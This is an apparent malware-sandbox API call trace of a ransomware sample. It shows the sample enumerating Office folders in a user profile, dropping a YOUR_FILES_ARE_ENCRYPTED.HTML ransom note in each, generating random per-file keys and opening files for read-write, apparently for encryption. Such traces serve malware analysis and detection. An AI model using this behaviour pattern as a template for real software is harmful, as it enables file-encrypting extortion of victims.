lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers" [0159.558] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\*" [0159.560] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\*", lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x33b4bbd0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x33b4bbd0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x33b4bbd0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f32c0 [0159.561] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x33b4bbd0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x33b4bbd0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x33b4bbd0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.561] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x33b4bbd0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x69b12cf0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x69b12cf0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="officeclient.microsoft.com", cAlternateFileName="OFFICE~1.COM")) returned 1 [0159.561] wnsprintfW (in: pszDest=0x7422068, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\officeclient.microsoft.com") returned 111 [0159.561] GetProcessHeap () returned 0x270000 [0159.561] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0159.561] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\officeclient.microsoft.com" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\officeclient.microsoft.com") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\officeclient.microsoft.com" [0159.561] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\officeclient.microsoft.com", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\officeclient.microsoft.com\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\officeclient.microsoft.com\\*" [0159.561] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\officeclient.microsoft.com\\*", lpFindFileData=0x4ebc90c | out: lpFindFileData=0x4ebc90c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x33b4bbd0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x69b12cf0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x69b12cf0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3300 [0159.563] FindNextFileW (in: hFindFile=0x42f3300, lpFindFileData=0x4ebc90c | out: lpFindFileData=0x4ebc90c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x33b4bbd0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x69b12cf0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x69b12cf0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.563] FindNextFileW (in: hFindFile=0x42f3300, lpFindFileData=0x4ebc90c | out: lpFindFileData=0x4ebc90c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x33b4bbd0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x33b4bbd0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x33b4bbd0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x2071b, dwReserved0=0x0, dwReserved1=0x60, cFileName="54544101-5BBD-4F41-A10F-924E31A9B483", cAlternateFileName="545441~1")) returned 1 [0159.563] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\officeclient.microsoft.com\\54544101-5BBD-4F41-A10F-924E31A9B483") returned 148 [0159.563] lstrcmpW (lpString1="54544101-5BBD-4F41-A10F-924E31A9B483", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.563] PathFindExtensionW (pszPath="54544101-5BBD-4F41-A10F-924E31A9B483") returned="" [0159.563] lstrlenW (lpString="") returned 0 [0159.563] PathFindExtensionW (pszPath="54544101-5BBD-4F41-A10F-924E31A9B483") returned="" [0159.563] FindNextFileW (in: hFindFile=0x42f3300, lpFindFileData=0x4ebc90c | out: lpFindFileData=0x4ebc90c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x69aecb90, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0x69aecb90, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x69aecb90, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x2071b, dwReserved0=0x0, dwReserved1=0x60, cFileName="CF7D9F32-AF75-437E-863A-A6D7ABB42233", cAlternateFileName="CF7D9F~1")) returned 1 [0159.563] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\officeclient.microsoft.com\\CF7D9F32-AF75-437E-863A-A6D7ABB42233") returned 148 [0159.563] lstrcmpW (lpString1="CF7D9F32-AF75-437E-863A-A6D7ABB42233", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.563] PathFindExtensionW (pszPath="CF7D9F32-AF75-437E-863A-A6D7ABB42233") returned="" [0159.563] lstrlenW (lpString="") returned 0 [0159.563] PathFindExtensionW (pszPath="CF7D9F32-AF75-437E-863A-A6D7ABB42233") returned="" [0159.563] FindNextFileW (in: hFindFile=0x42f3300, lpFindFileData=0x4ebc90c | out: lpFindFileData=0x4ebc90c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x69aecb90, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0x69aecb90, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x69aecb90, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x2071b, dwReserved0=0x0, dwReserved1=0x60, cFileName="CF7D9F32-AF75-437E-863A-A6D7ABB42233", cAlternateFileName="CF7D9F~1")) returned 0 [0159.563] FindClose (in: hFindFile=0x42f3300 | out: hFindFile=0x42f3300) returned 1 [0159.565] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\officeclient.microsoft.com\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 141 [0159.565] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\officeclient.microsoft.com\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\16.0\\webservicecache\\allusers\\officeclient.microsoft.com\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0159.567] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebcbd8, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebcbd8*=0x3c00, lpOverlapped=0x0) returned 1 [0159.569] CloseHandle (hObject=0x5ac) returned 1 [0159.569] GetProcessHeap () returned 0x270000 [0159.571] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0159.571] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x33b4bbd0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x69b12cf0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x69b12cf0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="officeclient.microsoft.com", cAlternateFileName="OFFICE~1.COM")) returned 0 [0159.571] FindClose (in: hFindFile=0x42f32c0 | out: hFindFile=0x42f32c0) returned 1 [0159.571] wnsprintfW (in: pszDest=0x7422068, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 114 [0159.571] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\16.0\\webservicecache\\allusers\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0159.571] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebcee4, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebcee4*=0x3c00, lpOverlapped=0x0) returned 1 [0159.573] CloseHandle (hObject=0x58c) returned 1 [0159.574] GetProcessHeap () returned 0x270000 [0159.574] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0159.574] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x33b4bbd0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x33b4bbd0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x33b4bbd0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1e12a7c, dwReserved1=0x0, cFileName="AllUsers", cAlternateFileName="")) returned 0 [0159.575] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0159.581] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 105 [0159.581] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\16.0\\webservicecache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x590 [0159.581] WriteFile (in: hFile=0x590, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0159.583] CloseHandle (hObject=0x590) returned 1 [0159.584] GetProcessHeap () returned 0x270000 [0159.585] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0159.585] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xef3e1d00, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xef3e1d00, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xef3e1d00, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x197dc, dwReserved0=0x0, dwReserved1=0x60, cFileName="winword.exe_Rules.xml", cAlternateFileName="WINWOR~1.XML")) returned 1 [0159.585] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\winword.exe_Rules.xml") returned 81 [0159.585] lstrcmpW (lpString1="winword.exe_Rules.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.586] PathFindExtensionW (pszPath="winword.exe_Rules.xml") returned=".xml" [0159.586] lstrlenW (lpString=".xml") returned 4 [0159.586] PathFindExtensionW (pszPath="winword.exe_Rules.xml") returned=".xml" [0159.586] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0159.586] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\winword.exe_Rules.xml" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\16.0\\winword.exe_rules.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0159.587] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=104412) returned 1 [0159.587] GetProcessHeap () returned 0x270000 [0159.587] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0159.591] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="09") returned 2 [0159.591] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="C9") returned 2 [0159.591] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="FD") returned 2 [0159.591] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="D4") returned 2 [0159.591] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="0F") returned 2 [0159.591] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="78") returned 2 [0159.591] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="A8") returned 2 [0159.591] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="54") returned 2 [0159.591] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="21") returned 2 [0159.591] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="82") returned 2 [0159.591] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="D9") returned 2 [0159.591] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="52") returned 2 [0159.591] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="8D") returned 2 [0159.591] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="88") returned 2 [0159.591] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="ED") returned 2 [0159.591] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="DF") returned 2 [0159.591] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="5D") returned 2 [0159.591] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="BE") returned 2 [0159.591] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="1E") returned 2 [0159.592] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="F6") returned 2 [0159.592] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="86") returned 2 [0159.592] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="FD") returned 2 [0159.592] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="DA") returned 2 [0159.592] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="7B") returned 2 [0159.592] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="CB") returned 2 [0159.592] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="10") returned 2 [0159.592] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="6E") returned 2 [0159.592] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="DA") returned 2 [0159.592] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="4C") returned 2 [0159.592] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="80") returned 2 [0159.592] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="02") returned 2 [0159.592] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="30") returned 2 [0159.592] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\winword.exe_Rules.xml" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\winword.exe_Rules.xml") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\winword.exe_Rules.xml" [0159.593] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0159.593] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0159.593] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xef3e1d00, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xef3e1d00, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xef3e1d00, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x197dc, dwReserved0=0x0, dwReserved1=0x60, cFileName="winword.exe_Rules.xml", cAlternateFileName="WINWOR~1.XML")) returned 0 [0159.593] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0159.593] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 89 [0159.593] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\16.0\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0159.594] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0159.596] CloseHandle (hObject=0x5a8) returned 1 [0159.597] GetProcessHeap () returned 0x270000 [0159.597] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0159.597] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5ad2f470, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x82a878d0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x82a878d0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="OTele", cAlternateFileName="")) returned 1 [0159.598] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele") returned 60 [0159.598] GetProcessHeap () returned 0x270000 [0159.598] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0159.598] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele" [0159.598] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\*" [0159.598] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5ad2f470, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x82a878d0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x82a878d0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0159.601] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5ad2f470, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x82a878d0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x82a878d0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.603] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf1e947a0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf1e947a0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf1e947a0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x11b, dwReserved0=0x0, dwReserved1=0x60, cFileName="{1C9909C9-FD1C-4E1B-870C-6B753D804628} (0) - 2028 - winword.exe - OTele.dat", cAlternateFileName="{1C990~2.DAT")) returned 1 [0159.603] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{1C9909C9-FD1C-4E1B-870C-6B753D804628} (0) - 2028 - winword.exe - OTele.dat") returned 136 [0159.603] lstrcmpW (lpString1="{1C9909C9-FD1C-4E1B-870C-6B753D804628} (0) - 2028 - winword.exe - OTele.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.604] PathFindExtensionW (pszPath="{1C9909C9-FD1C-4E1B-870C-6B753D804628} (0) - 2028 - winword.exe - OTele.dat") returned=".dat" [0159.604] lstrlenW (lpString=".dat") returned 4 [0159.604] PathFindExtensionW (pszPath="{1C9909C9-FD1C-4E1B-870C-6B753D804628} (0) - 2028 - winword.exe - OTele.dat") returned=".dat" [0159.604] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0159.604] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{1C9909C9-FD1C-4E1B-870C-6B753D804628} (0) - 2028 - winword.exe - OTele.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\otele\\{1c9909c9-fd1c-4e1b-870c-6b753d804628} (0) - 2028 - winword.exe - otele.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0159.616] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=283) returned 1 [0159.616] CloseHandle (hObject=0x590) returned 1 [0159.616] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf1e947a0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf1e947a0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf1e947a0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x34d, dwReserved0=0x0, dwReserved1=0x60, 